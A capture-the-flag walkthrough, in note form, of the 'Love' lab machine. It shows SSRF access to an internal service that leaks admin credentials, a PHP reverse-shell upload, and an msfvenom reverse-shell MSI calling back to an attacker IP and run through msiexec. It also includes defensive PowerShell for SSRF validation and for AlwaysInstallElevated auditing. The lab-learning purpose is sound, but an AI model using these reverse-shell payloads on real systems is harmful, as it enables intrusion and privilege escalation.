## Recon
- web app - 80
- mariadb - 3306 (not allowed to connect to this server)
- web server - 5000
- OS: Windows 10 Pro 19042
### SMB - 445
- null bind - allowed
- null shares - denied
- guest account - disabled
- potentially vulnerable to SMBGhost (CVE-2020-0796)
- spooler service enabled
### pando-pub - 7680
- no love
- can connect using `nc -nv $RHOST 7680`
- no gobuster
### HTTP - 5000
- 403 Not allowed
### staging.love.htb
http://staging.love.htb/
![[Pasted image 20250221121517.png]]
## Initial Access
Navigate to http://staging.love.htb and input `127.0.0.1:5000`. The site fetches the supplied address server-side, which is why the port 5000 service that only returns a 403 to outside clients is reachable this way:
![[Pasted image 20250221121543.png]]
and we get back some credentials:
![[Pasted image 20250219231618.png]]
`admin:@LoveIsInTheAir!!!!`
These credentials can be used to log in to the previously inaccessible voting admin panel at http://love.htb/admin/.
In order to gain a reverse shell, edit the user profile in the top right corner and "update the photo" with a `.php` reverse shell:
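The staging site above is exploitable because it fetches whatever address the user submits, loopback included. As an added example that is not part of the original notes or the target application, this is the kind of destination check a server-side fetcher should run before following a user-supplied URL; the function names (`Test-SafeFetchUrl`, `Test-InternalAddress`) and the sample URLs are mine.

```powershell
# Added example: validate a user-supplied URL before a server-side fetch so that
# loopback and internal-only hosts (like the 403-only port 5000 service) are refused.

function Test-InternalAddress {
    param([Parameter(Mandatory)][System.Net.IPAddress]$Ip)

    # IPv4-mapped IPv6 (::ffff:127.0.0.1) must be checked as its IPv4 form
    if ($Ip.IsIPv4MappedToIPv6) { $Ip = $Ip.MapToIPv4() }

    if ([System.Net.IPAddress]::IsLoopback($Ip)) { return $true }

    if ($Ip.AddressFamily -eq [System.Net.Sockets.AddressFamily]::InterNetworkV6) {
        return ($Ip.IsIPv6LinkLocal -or $Ip.IsIPv6SiteLocal -or
                $Ip.Equals([System.Net.IPAddress]::IPv6Any))
    }

    $b = $Ip.GetAddressBytes()
    # 0.0.0.0/8, RFC 1918 (10/8, 172.16/12, 192.168/16) and link-local 169.254/16
    return ($b[0] -eq 0) -or
           ($b[0] -eq 10) -or
           ($b[0] -eq 172 -and $b[1] -ge 16 -and $b[1] -le 31) -or
           ($b[0] -eq 192 -and $b[1] -eq 168) -or
           ($b[0] -eq 169 -and $b[1] -eq 254)
}

function Test-SafeFetchUrl {
    param([Parameter(Mandatory)][string]$Url)

    $deny = { param($Reason) [pscustomobject]@{ Url = $Url; Allowed = $false; Reason = $Reason } }

    $uri = $null
    if (-not [System.Uri]::TryCreate($Url, [System.UriKind]::Absolute, [ref]$uri)) {
        return & $deny 'not an absolute URL'
    }
    if ($uri.Scheme -notin 'http', 'https') {
        return & $deny "scheme '$($uri.Scheme)' not allowed"
    }

    # Resolve the name ourselves so a DNS record pointing at 127.0.0.1 is caught too.
    # Note: the fetcher must then connect to the address that was validated here,
    # otherwise a second lookup can be answered differently (DNS rebinding).
    try {
        $addresses = [System.Net.Dns]::GetHostAddresses($uri.DnsSafeHost)
    } catch {
        return & $deny 'DNS resolution failed'
    }
    foreach ($ip in $addresses) {
        if (Test-InternalAddress $ip) {
            return & $deny "host resolves to internal address $ip"
        }
    }
    [pscustomobject]@{ Url = $Url; Allowed = $true; Reason = 'ok' }
}

# Constructed sample inputs: the loopback URL from the walkthrough is refused,
# a scheme other than http/https is refused, an ordinary public URL is checked by DNS.
'http://127.0.0.1:5000', 'file:///C:/Windows/win.ini', 'http://[::1]:5000/', 'https://love.htb/' |
    ForEach-Object { Test-SafeFetchUrl $_ } | Format-Table -AutoSize
```

A deny-list of address ranges is the minimum; where the feature only ever needs to reach a known set of hosts, an allow-list of hostnames is the stronger fix, and the internal service on port 5000 should additionally require authentication rather than relying on a 403 for non-local clients.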
![[Pasted image 20250221125627.png]]
The reverse shell will automatically trigger upon page reload.
## Privesc
- Potential database credentials?
- Practice the port forwarding and see if MySQL (3306) can be reached from the local system
- Are there Azure tokens stored?
### Sensitive Files
```powershell
cat C:\Users\Phoebe\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
# contents of the history file:
curl 10.10.14.9:8000/dControl.zip -o dControl.zip
```
Let's attempt to locate the file in question:
```powershell
Get-ChildItem -Path C:\ -Filter "dControl.zip" -Recurse -ErrorAction SilentlyContinue
```
Yields nothing.
Pinging the remote host from the history file fails as well:
```powershell
Test-NetConnection -RemoteAddress 10.10.14.9
WARNING: Ping to 10.10.14.9 failed with status: TimedOut
```
A closer look at the winPEAS output reveals:
```
╔══════════╣ Checking AlwaysInstallElevated
╚ https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#alwaysinstallelevated
AlwaysInstallElevated set to 1 in HKLM!
AlwaysInstallElevated set to 1 in HKCU!
```
Refer to my [[Windows Privesc - Registry Misconfigurations]] note.
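The winPEAS lines above are the whole finding: the policy only matters when the value is 1 under both `HKLM` and `HKCU`, which is the case here. As an added example that is not part of the original notes, the following audits both keys the same way and shows the remediation; the function names are mine.

```powershell
# Added example: audit and remediate the AlwaysInstallElevated policy.
# Absence of the value is treated as 0 (disabled), matching Windows' default.

$AlwaysInstallElevatedKeys = @(
    'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer',
    'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
)

function Test-AlwaysInstallElevated {
    $keys = foreach ($path in $AlwaysInstallElevatedKeys) {
        $value = 0
        try {
            # Get-ItemProperty throws when the key or value is missing; that means "not set"
            $item  = Get-ItemProperty -Path $path -Name AlwaysInstallElevated -ErrorAction Stop
            $value = [int]$item.AlwaysInstallElevated
        } catch { }
        [pscustomobject]@{ Path = $path; AlwaysInstallElevated = $value }
    }

    # Exploitable only when BOTH the machine-wide and the per-user value are 1
    $setCount = @($keys | Where-Object { $_.AlwaysInstallElevated -eq 1 }).Count
    [pscustomobject]@{
        Keys        = $keys
        Exploitable = ($setCount -eq 2)
    }
}

function Disable-AlwaysInstallElevated {
    # Remediation: set the value back to 0 (HKLM needs an elevated shell).
    # The equivalent Group Policy setting is "Always install with elevated privileges"
    # under Administrative Templates > Windows Components > Windows Installer,
    # in both Computer Configuration and User Configuration.
    foreach ($path in $AlwaysInstallElevatedKeys) {
        if (Test-Path $path) {
            Set-ItemProperty -Path $path -Name AlwaysInstallElevated -Value 0 -Type DWord
        }
    }
}

$result = Test-AlwaysInstallElevated
$result.Keys | Format-Table -AutoSize
"Exploitable: $($result.Exploitable)"
```

For detection, MSI installs write MsiInstaller events to the Application log (event IDs 1033 and 11707 record a completed installation); an install of a package from a user-writable path on a host where this policy is enabled is worth an alert.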
Generating a `.MSI` payload:
```sh
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.11 LPORT=9000 -f msi -o shell.msi
```
Upload the payload and execute it:
```sh
msiexec /q /i shell.msi
```
## Lessons
- Got stuck in a rabbit hole with the PowerShell history file for too long
- Was reading through the winPEAS output too quickly and completely missed the totally obvious privesc vector...
- Had to get help to figure out the initial access vector; missed the `staging.love.htb` subdomain in my enumeration and had no idea that I could have set it up using `/etc/hosts`...